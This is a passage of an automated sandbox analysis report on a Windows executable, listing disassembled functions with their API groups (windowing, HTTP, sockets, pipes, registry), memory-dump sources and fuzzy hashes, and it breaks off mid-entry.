                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                          • String ID:
                                                                                          • API String ID: 3225163088-0
                                                                                          • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                          • Instruction ID: b52afbd0bfb219e3ca5aa8c7172dd940ec1e1acae393b71288ef09b68bf7171a
                                                                                          • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                          • Instruction Fuzzy Hash: 41A19C72A0C6C0C7D764AF19A4046AEFB75FB89B94F904125EAC917B68DB3CD442CF10
                                                                                          Function 00007FF74D0DFB28 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendWindow$Enabled
                                                                                          • String ID:
                                                                                          • API String ID: 3694350264-0
                                                                                          • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                          • Instruction ID: 1e89b0092547343b646c4a39bdefb40dcc4398b971ac5d9dd39fab86b186fbdc
                                                                                          • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                          • Instruction Fuzzy Hash: 2B918221E0D68AC5FB74BA1595643B9BB93AF44754F988033DAED036B1EF3CE4918321
                                                                                          Function 00007FF74D0A9034 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 87235514-0
                                                                                          • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                                          • Instruction ID: 83ad5d940e1b23a5a1555b1d6092ca6bfa00cb34b505531340f65560db351018
                                                                                          • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                                          • Instruction Fuzzy Hash: A9518112B1D2D195FB71BBB16104A7EAF91FB5BBC4FC88074DAC917B56DA28E4508330
                                                                                          Function 00007FF74D0BDBF0 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                          • String ID:
                                                                                          • API String ID: 3401586794-0
                                                                                          • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                          • Instruction ID: 98659e07049f0ea182bcb0723deae66e545cc7d629f62ef12588db61abd38314
                                                                                          • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                          • Instruction Fuzzy Hash: 5F51D622A0C642C6E714FF62A8047BEE7A0FB48B88F944031DE8E07B64EF39D455C760
                                                                                          Function 00007FF74D0A4860 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124comlibraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                                          • String ID: DllGetClassObject
                                                                                          • API String ID: 668425406-1075368562
                                                                                          • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                                          • Instruction ID: 6e317b3ab2f8bd54b452927bf6ac6726639357c13bda663238e9d30ce2c7cba4
                                                                                          • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                                          • Instruction Fuzzy Hash: 7A517C66A0C746C2EB14BF16E5403A9A361FB64B84F944534DB8D47B61EFBCE064C720
                                                                                          Function 00007FF74D0D9248 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongMessageSendWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3360111000-0
                                                                                          • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                          • Instruction ID: 4ed19a7441dd7df0b98ff10336213202b4975a5b9b09f35d7c515dd1da346ce3
                                                                                          • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                          • Instruction Fuzzy Hash: 13418225B0DA4AC1EA60FB19E4A4278B360EBC5F90F944132DE9E43BB4EE3DE4418710
                                                                                          Function 00007FF74D0C37A8 Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 4170576061-0
                                                                                          • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                          • Instruction ID: e1aeea7da9bb2f6526a1e919b7fcbf7159d292fda68fcd0324fc7f3ce5597773
                                                                                          • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                          • Instruction Fuzzy Hash: 33418332A1C782C2EB24BB66A4482ADB360FB45BA4F804631DE9E43BA5DF3CD545C710
                                                                                          Function 00007FF74D0DA884 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                          • String ID:
                                                                                          • API String ID: 161812096-0
                                                                                          • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                                          • Instruction ID: 1d521389d3317b6b35022fae1e1e7bd175439f2eacd8d668282c5dc79aea327c
                                                                                          • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                                          • Instruction Fuzzy Hash: 06415B36A0DB05C5EB50EF22E4946ACB7A0FB88B98F954136EE9D03B64EF38D445C710
                                                                                          Function 00007FF74D0D15C4 Relevance: 10.6, APIs: 7, Instructions: 90registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                          • String ID:
                                                                                          • API String ID: 395352322-0
                                                                                          • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                          • Instruction ID: cc7aac954370a58f3c0b7c9e8034274e4db2851e5363ff71be10878046259ee4
                                                                                          • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                          • Instruction Fuzzy Hash: DA416F3661CB85C5E720EF11E4587EEA3A0FB89744F840136EA8D07A68EF3DD249C751
                                                                                          Function 00007FF74D0A4FCC Relevance: 10.6, APIs: 7, Instructions: 76memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                          • String ID:
                                                                                          • API String ID: 3761583154-0
                                                                                          • Opcode ID: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                                                          • Instruction ID: e3abd58f8b5815f8be1d264adf9a62977fcbb1e38eb942613741bd69f1a80c23
                                                                                          • Opcode Fuzzy Hash: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                                                          • Instruction Fuzzy Hash: CD318221B0CB45C5DB50BF12E44866DB3A0FB99FD0F888635DA9D137A4DE3CE4448324
                                                                                          Function 00007FF74D0A4EB0 Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocByteCharMultiStringWide
                                                                                          • String ID:
                                                                                          • API String ID: 3603722519-0
                                                                                          • Opcode ID: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                                                          • Instruction ID: b71b0ed620cccebe3cffc48453154fa9b0dff230b9aaef515670f7865cec520c
                                                                                          • Opcode Fuzzy Hash: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                                                          • Instruction Fuzzy Hash: 64317425A0CB45C9D750BF12E548269F3A0FB58FD0F885636DA9D13BA5EF3CD5848720
                                                                                          Function 00007FF74D0DAEDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                          • String ID: Msctls_Progress32
                                                                                          • API String ID: 1025951953-3636473452
                                                                                          • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                                          • Instruction ID: 078b29a846dcdf0f563c002c11e10c0da07137db817b9e09b6787ac2255d7194
                                                                                          • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                                          • Instruction Fuzzy Hash: C0314836A0C681C7E370AF15F498B1AB661EB88790F509239EB9903F68DF3CD4458B10
                                                                                          Function 00007FF74D0AFAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHandlePipe
                                                                                          • String ID: nul
                                                                                          • API String ID: 1424370930-2873401336
                                                                                          • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                          • Instruction ID: 4d07a9fd8b7a46d81ca262849c7032e90d391f29b045bdcf26bf7bd0b0fcb875
                                                                                          • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                          • Instruction Fuzzy Hash: C5315272A1CA46C1EB10BB25D414379A7A0EBA5B78F900336EABD077E4EF3DD4458721
                                                                                          Function 00007FF74D0AF9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHandlePipe
                                                                                          • String ID: nul
                                                                                          • API String ID: 1424370930-2873401336
                                                                                          • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                          • Instruction ID: afbe0a2e498830371715031af537298926672c25d028e78930ca27e6cffd1719
                                                                                          • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                          • Instruction Fuzzy Hash: 48216461A1CB46C1E710BB24D0143B9A7A0FBA5778F904336EAAE077E5EF7CD4458720
                                                                                          Function 00007FF74D038F40 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                          • String ID:
                                                                                          • API String ID: 3220332590-0
                                                                                          • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                                          • Instruction ID: e315aeb7c3eedd44ba892d34452e7c7aace5d07cb504f90f20408f1d9517bc35
                                                                                          • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                                          • Instruction Fuzzy Hash: E2A1F46AA1C243CAE724BF7195047BDB3A0FF44B58F541135DE995BAA4FA3D9840D330
                                                                                          Function 00007FF74D05A054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: f$p
                                                                                          • API String ID: 3215553584-1290815066
                                                                                          • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                          • Instruction ID: b0c036f5f0ec853208bb3edd2d484f64a33ae94d9a6ff29ffe3335511c4c4bb9
                                                                                          • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                          • Instruction Fuzzy Hash: 0F128422E1E253C6FB20FA14E06467AF661EB40754FD54232EAD9076E4EF3DF5809B24
                                                                                          Function 00007FF74D09AD30 Relevance: 9.2, APIs: 6, Instructions: 193memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                          • String ID:
                                                                                          • API String ID: 3859894641-0
                                                                                          • Opcode ID: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                                          • Instruction ID: eddf6c020543f896e19cea1951d4b4ef86eee085a154e7a04da8be56d562a8dd
                                                                                          • Opcode Fuzzy Hash: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                                          • Instruction Fuzzy Hash: 1A713C71A0C242C2EE64BB66956417CE2A2FF46B80F948576D7CE077B5FF2CE9118321
                                                                                          Function 00007FF74D0AD1F0 Relevance: 9.1, APIs: 6, Instructions: 131filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
